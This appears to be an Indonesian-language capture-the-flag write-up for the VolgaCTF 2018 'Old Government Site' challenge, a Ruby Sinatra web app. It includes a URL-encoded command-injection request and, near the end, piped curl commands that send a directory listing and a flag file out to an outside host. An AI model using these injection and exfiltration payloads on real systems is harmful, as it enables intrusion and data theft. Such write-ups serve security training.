External Service Interaction (HTTP, DNS, etc)

Volga 2018 - Old Government Site

Masalah

Variasi URI:

http://old-government-site.quals.2018.volgactf.ru:8080/
http://old-government-site.quals.2018.volgactf.ru:8080/?page=2

Ujicoba serangan

• Burp w/ Dirbuster wordlist
• Burp scanner
• Burp intruder all attack

Hasil:

Nihil

Error:

>
GET /page?id=%oa%20ping%20-n%2030%20127%2e0%2e0%2e1%20%0a HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://old-government-site.quals.2018.volgactf.ru:8080/
Cookie: _ga=GA1.2.486151065.1521859898; _gid=GA1.2.1333911552.1521859898
Connection: close
Upgrade-Insecure-Requests: 1

<
HTTP/1.1 400 Bad Request 
Content-Type: text/html;charset=utf-8
Content-Length: 91
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)
Date: Sun, 25 Mar 2018 04:13:32 GMT
Connection: close

Invalid query parameters: invalid %-encoding (%oa%20ping%20-n%2030%20127%2e0%2e0%2e1%20%0a)

Jika 404:

Sinatra doesn’t know this ditty.
Try this:

get '/.git/' do
  "Hello World"
end

Teknologi yang digunakan:

Ruby Sinatra

Vulnerability yang berkaitan:

DOS

http://cryptologie.net/article/276/cve-tomek?utm_content=buffer3f597&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

Session

https://www.reddit.com/r/netsec/comments/639myb/exploiting_a_weak_session_secret_in_a_sinatrarack/

SSRF

https://stackoverflow.com/questions/8618607/how-can-i-get-sinatra-to-set-the-content-length-based-on-a-static-files-size

Ujicoba serangan

• Number

Ditemukan URI /?page=18

Pada halaman tersebut, terdapat form yang jika diisi menampilkan output error atau validated.

../ validated
% error

Eksploitasi External Service Interaction HTTP

| curl yanapermana.com --data " $(ls | tr '\n' ' ') "
| curl -X POST -d @../../flag yanapermana.com

grep -rnw '/' -e 'Volga'

Referensi

• https://stackoverflow.com/questions/16956810/how-do-i-find-all-files-containing-specific-text-on-linux
• https://portswigger.net/kb/issues/00300210_external-service-interaction-http